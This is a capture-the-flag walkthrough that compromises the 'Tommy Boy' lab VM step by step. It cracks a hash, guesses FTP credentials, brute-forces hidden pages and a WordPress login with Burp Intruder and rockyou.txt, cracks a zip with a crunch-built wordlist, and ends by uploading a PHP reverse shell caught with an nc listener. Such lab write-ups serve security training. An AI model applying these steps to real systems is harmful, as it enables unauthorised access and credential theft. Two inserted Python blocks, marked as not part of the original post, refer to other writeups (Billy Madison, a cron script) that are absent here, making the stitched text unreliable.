There is a hidden company blog stored in a hidden folder whose name must be guessed by watching the YouTube video linked in the comments. The video is just the phrase “Hey Prehistoric Forest”, so try to open /prehistoricforest. It works, we are in the company blog! Before analyzing it, open /robots.txt, which has interesting entries as nmap said:

User-agent: *
Disallow: /6packsofb...soda
Disallow: /lukeiamyourfather
Disallow: /lookalivelowbridge
Disallow: /flag-numero-uno.txt

There are 3 folders which contain some images I can ignore, and a .txt file: the first flag. Just browse to /flag-numero-uno.txt; the first flag is: B34rcl4ws. Now we can analyze the blog.

Flag 2

Open the blog again and start reading the posts. There is a message by richard which is protected by a password that I need to find. The latest post on the blog is a request by Tom Jr. asking richard for the password of the post, and there is a comment; read it:

Hey numbnuts, look at the /richard folder on this server. I’m sure that picture will jog your memory.

Since you have a small brain: see up top in the address bar thingy? Erase “/prehistoricforest” and put “/richard” there instead.

So let’s navigate to /richard and download the image shockedrichard.jpg. I was pretty sure that the password was hidden in the image comment, so I used exiftool to extract it:

./exiftool shockedrichard.jpg

This is the output:

ExifTool Version Number         : 10.24
File Name                       : shockedrichard.jpg
Directory                       : /home/cristiano/Scaricati
File Size                       : 163 kB
File Modification Date/Time     : 2016:08:01 00:15:25+02:00
File Access Date/Time           : 2016:08:01 00:16:30+02:00
File Inode Change Date/Time     : 2016:08:01 00:15:25+02:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Exif Byte Order                 : Little-endian (Intel, II)
Software                        : Google
Copyright                       : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Exif Version                    : 0220
User Comment                    : ce154b5a8e59c89732bc25d6a2e6b90b
Exif Image Width                : 1600
Exif Image Height               : 1029
XMP Toolkit                     : Image::ExifTool 9.97
Rights                          : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Creator Tool                    : Google
Profile CMM Type                : Lino
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : IEC
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Media-Relative Colorimetric
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : HP
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Current IPTC Digest             : adfc7551120fa16884c295b6d397931f
Envelope Record Version         : 4
Coded Character Set             : UTF8
Application Record Version      : 4
Copyright Notice                : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
IPTC Digest                     : adfc7551120fa16884c295b6d397931f
Image Width                     : 1600
Image Height                    : 1029
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1600x1029
Megapixels                      : 1.6

The image comment is:

ce154b5a8e59c89732bc25d6a2e6b90b

It seems to be an MD5 hash; crack it with HashKiller and you will find the post password: spanky. Now we can read the post; in a few words, we need to restore the backup of the website by renaming callahanbak.bak, which is located in Big Tom’s SSH account, to index.html. Tom’s SSH username is in the list of WordPress users, but I don’t have his password. Also there is an FTP service running on the machine, listening on a port different from the default (21), and this service is unstable: every 15 minutes it goes up and down. The FTP username of richard is nickburns, but I need to find the password, which seems to be very easy to guess.

Let’s finish analyzing the remaining posts: notice the first post made on this blog and open its comment:

Well put boss 😉

Flag #2: thisisthesecondflagyayyou.txt

Navigate to /prehistoricforest/thisisthesecondflagyayyou.txt and collect the second flag: Z4l1nsky. Now I can go further.

Flag 3

I focused on the FTP service, so I rescanned the IP across the full port range:

nmap 192.168.1.15 -p 1-65535

And now a wild port appears:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-02 15:41 CEST
Nmap scan report for 192.168.1.15
Host is up (0.029s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
8008/tcp  open  http
65534/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 9.62 seconds

Open an ftp command shell and type:

open 192.168.1.15 65534

Now I use nickburns as username, but I need to guess the password, which could be equal to the username, so try nickburns as password. Now I am logged into the FTP server; list the files and you will see a readme.txt. Download it:

get readme.txt

Close ftp shell and read the file:

cat readme.txt

There is a message from Nick who says that there is a /NickIzL33t subfolder somewhere on the server, containing an encrypted .zip with all of Big Tom’s passwords. Nick also says that I can use that folder as a Dropbox to access my files from the phone. There is no such subfolder on 192.168.1.15, but there is another HTTP service listening on port 8008, so navigate to 192.168.1.15:8008 and you will see a simple Nick HTML page. Browse to /NickIzL33t and another Nick HTML page appears, but there seems to be nothing there. So I tried changing my User-Agent to a mobile device (iOS) with Burp Suite as proxy, and when I refreshed the page, it changed! There is a message which says:

Gotta know the EXACT name of the .html to break into this fortress.

So it’s time for a brute-force attack. I captured the GET request for the page with Burp Suite by refreshing it, then I sent it to Intruder with the following payload:

GET /NickIzL33t/§page§.html HTTP/1.1
Host: 192.168.1.15:8008
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 15 Jul 2016 02:11:27 GMT
If-None-Match: "10e-537a322dc0ba6-gzip"
Cache-Control: max-age=0

I used rockyou.txt as wordlist and started the attack. After some minutes I found fallon1.html as an HTML page with response code 200. So I navigated to /NickIzL33t/fallon1.html and the famous page showed up. I found a hint:

Big Tom,

Your password vault is protected with (yep, you guessed it) a PASSWORD!  
And because you were choosing stupidiculous passwords like "password123" and "brakepad" I
enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!!

Your password is your wife's nickname "bev" (note it's all lowercase) plus the following:

* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters

Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one 
big chunk ok?  Heh, "big chunk."  A big chunk typing big chunks.  That's funny.

LOL

-Nick

The page gives the 3rd flag, TinyHead, and the encrypted .zip file.

Flag 4

Now I need to crack the .zip file, which is protected by a password. Fortunately the password has a known pattern, so I used crunch to create a custom wordlist:

crunch 13 13 -t bev,%%@@^1995 -o wordlist.txt

Now, to crack the zip password, I used fcrackzip:

fcrackzip -u -v -D -p wordlist.txt t0msp4ssw0rdz.zip

After some minutes I found the password: bevH00tr$1995
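Nick's note spelled out the structure of Big Tom's password, and crunch turned that structure into a wordlist. As an added example that is not part of the original post, the Python below parses the same -t pattern, computes how many candidates it describes, and compares that with the space of all 13-character printable passwords, which is the defender's lesson here: a 13-character minimum buys nothing once the layout is known. The placeholder semantics follow the crunch man page; the symbol alphabet (string.punctuation standing in for crunch's built-in symbol set) and the guess rate in the demo are assumptions of mine, so the counts are close to, not identical with, what crunch emits.

```python
import math
import string

# crunch -t placeholders (crunch man page): @ lowercase, "," uppercase, % digit, ^ symbol.
# Assumption: string.punctuation (32 characters) stands in for crunch's symbol set.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": string.punctuation,
}
PRINTABLE = string.ascii_letters + string.digits + string.punctuation + " "  # 95 characters


def keyspace(pattern: str) -> int:
    """Number of candidates a -t pattern describes; a literal character counts once."""
    total = 1
    for ch in pattern:
        total *= len(PLACEHOLDERS.get(ch, ch))  # a literal is a one-character alphabet
    return total


def matches(candidate: str, pattern: str) -> bool:
    """True if candidate is one of the strings the pattern describes."""
    if len(candidate) != len(pattern):
        return False
    return all(c in PLACEHOLDERS[p] if p in PLACEHOLDERS else c == p
               for c, p in zip(candidate, pattern))


def unconstrained_keyspace(length: int, alphabet: str = PRINTABLE) -> int:
    """Size of the space a policy of 'length characters, any printable' actually offers."""
    return len(alphabet) ** length


def entropy_bits(n: int) -> float:
    return math.log2(n)


def seconds_to_exhaust(n: int, guesses_per_second: float) -> float:
    return n / guesses_per_second


PAGE_PATTERN = "bev,%%@@^1995"   # the crunch pattern used above
PAGE_PASSWORD = "bevH00tr$1995"  # the password fcrackzip recovered

if __name__ == "__main__":
    hinted = keyspace(PAGE_PATTERN)
    full = unconstrained_keyspace(len(PAGE_PATTERN))
    print(f"pattern keyspace: {hinted:,} ({entropy_bits(hinted):.1f} bits)")
    print(f"13 printable chars: {full:.3e} ({entropy_bits(full):.1f} bits)")
    print("page password fits the pattern:", matches(PAGE_PASSWORD, PAGE_PATTERN))
    # Assumed rate: 1e5 guesses/s, a modest single-CPU zip-cracking speed.
    rate = 1e5
    print(f"{seconds_to_exhaust(hinted, rate) / 60:.1f} minutes vs "
          f"{seconds_to_exhaust(full, rate) / 3.15e7:.2e} years")
```

The hinted space is under 26 bits while the nominal 13-character space is over 85 bits; the fixed prefix, the fixed year and the announced character classes removed almost all of the strength the length requirement was supposed to add.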

Unzip the file and open passwords.txt. Interesting section:

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ??? 
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

To find the SSH password I need to break into the WordPress blog, but Big Tom doesn’t seem to remember his username, so I used wpscan to enumerate users:

sudo wpscan -u 192.168.1.15/prehistoricforest --enumerate u

The output:

+----+----------+-------------------+
| Id | Login    | Name              |
+----+----------+-------------------+
| 1  | richard  | richard           |
| 2  | tom      | Big Tom           |
| 3  | tommy    | Tom Jr.           |
| 4  | michelle | Michelle Michelle |
+----+----------+-------------------+

So Big Tom’s username is tom, but I need to find the password. The hint is a famous Queen song, but I think it refers to the rockyou.txt wordlist. So I used Burp Suite to brute-force the login credentials: I intercepted the POST request from /wp-admin with the proxy, then I sent the following request to Intruder:

POST /prehistoricforest/wp-login.php HTTP/1.1
Host: 192.168.1.15
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.15/prehistoricforest/wp-login.php
Cookie: wp-postpass_3604ebf3b5bc65ba9e61d2ca579e65ae=%24P%24B137jyM8khyXYMZ82AEpHgB2Mv9OKi.; wp-settings-time-2=1470085172; wordpress_test_cookie=WP+Cookie+check
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

log=tom&pwd=§password§&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.15%2Fprehistoricforest%2Fwp-admin%2F&testcookie=1

I waited some minutes, then I found tom’s login password: tomtom1. It’s time to log in. Open Big Tom’s draft:

Ok so Nick always yells at me for forgetting the second part of my "ess ess eight (ache? H?) password so I'm writing it here:

1938!!

Nick, if you're reading this, I DON'T CARE IF I"M USING THIS THING AS A PASSWORD VAULT. YOU TOOK AWAY MY STICKIES SO I"LL PUT MY PASSWORDS ANY DANG PLACE I WANT.

So Big Tom’s SSH username is bigtommysenior and the password is fatguyinalittlecoat1938!!. Log in with SSH:

ssh bigtommysenior@192.168.1.15

Enter the password and voilà, I am logged in via SSH. List the files and you will notice the 4th flag, EditButton, and the backup file. Restore it:

cp callahanbak.bak /var/www/html/index.html

Navigate with your browser to /index.html and you will see the home page of the website. Now we need to find the last flag which, according to the 4th one, is in the root of this server at /5.txt.

Flag 5

Navigating to the root directory and listing the files, I see that I can’t read .5.txt; only the user www-data can, so I need to escalate privileges. Let’s check for world-writable directories:

find / -perm -2 -type d 2>/dev/null

And an interesting one shows up:

/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads
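The three filesystem conditions exploited across these writeups (a setuid/setgid binary in an unusual place such as /usr/local/share/sgml/donpcgd in Billy Madison, a root cron script written from an unprivileged shell, and the world-writable uploads directory found just above) are all things a host audit can list before anyone else does. As an added example that is not part of the original post, here is a Python audit that walks a directory tree for them. build_demo_tree() constructs a throwaway fake filesystem reproducing those cases with the paths from the page, and EXPECTED_SETID_DIRS and CRON_DIRS are lists of my own.

```python
import os
import stat
import tempfile

# Where setuid/setgid binaries normally live (relative to the scanned root);
# anything elsewhere, like the page's usr/local/share/sgml/donpcgd, is reported.
EXPECTED_SETID_DIRS = ("bin", "sbin", "usr/bin", "usr/sbin", "usr/lib", "usr/libexec",
                       "usr/local/bin", "usr/local/sbin")
CRON_DIRS = ("etc/cron.d", "etc/cron.hourly", "etc/cron.daily",
             "etc/cron.weekly", "etc/cron.monthly")


def _under(rel: str, prefixes) -> bool:
    return any(rel == p or rel.startswith(p + "/") for p in prefixes)


def audit_tree(root: str) -> dict:
    """Walk root without following symlinks and collect three classes of
    privilege-escalation enablers. Paths are returned relative to root."""
    report = {"world_writable_dirs": [], "unexpected_setid": [], "writable_cron_scripts": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                mode = os.lstat(full).st_mode
            except OSError:
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if stat.S_ISDIR(mode):
                # World-writable without the sticky bit: anyone can add or replace files.
                if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                    report["world_writable_dirs"].append(rel)
            elif stat.S_ISREG(mode):
                if mode & (stat.S_ISUID | stat.S_ISGID) and not _under(rel, EXPECTED_SETID_DIRS):
                    report["unexpected_setid"].append(rel)
                # A scheduler script writable by group or others is root code anyone can edit.
                if _under(rel, CRON_DIRS) and mode & (stat.S_IWGRP | stat.S_IWOTH):
                    report["writable_cron_scripts"].append(rel)
    for key in report:
        report[key].sort()
    return report


def build_demo_tree() -> str:
    """Constructed fake filesystem reproducing the conditions from the
    walkthroughs; returns the temporary root directory."""
    root = tempfile.mkdtemp(prefix="fs-audit-demo-")

    def mkfile(rel, mode):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)

    def mkdir(rel, mode):
        path = os.path.join(root, rel)
        os.makedirs(path, exist_ok=True)
        os.chmod(path, mode)

    mkfile("usr/bin/passwd", 0o4755)                # setuid where it is expected
    mkfile("usr/local/share/sgml/donpcgd", 0o6755)  # setuid+setgid in an odd place
    mkdir("var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads", 0o777)  # open drop zone
    mkdir("tmp", 0o1777)                            # world-writable but sticky: normal
    mkfile("etc/cron.hourly/rootme", 0o666)         # root-run script anyone can edit
    mkfile("etc/cron.hourly/logrotate", 0o755)
    return root


if __name__ == "__main__":
    import json
    print(json.dumps(audit_tree(build_demo_tree()), indent=2))
    # On a live host: audit_tree("/"), run as root so every directory is readable.
```

Each finding maps to a fix: add the sticky bit or tighten the mode on the directory, strip the setid bit (or remove the binary) where it has no business being, and keep scheduler scripts root-owned with mode 0755 or tighter.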

Browse to /NickIzL33t/P4TCH_4D4MS (remember to change the User-Agent) and an upload form appears. Upload a PHP reverse shell as .jpg, then rename the file to .php; in fact we have access to the /uploads folder via SSH. Listen locally for the incoming connection:

nc -lvp 1234

Then open /NickIzL33t/P4TCH_4D4MS/uploads/php-reverse-shell.php and a shell will be spawned in your local terminal. Just get the last flag:

cat .5.txt

Which is: Buttcrack. Now return to the SSH shell, go to Big Tom’s home folder and unzip LOOT.ZIP. It requires a password, which is all the flags put together: B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack. THE-END.txt will be extracted. Read it. The VM is completely pwned!
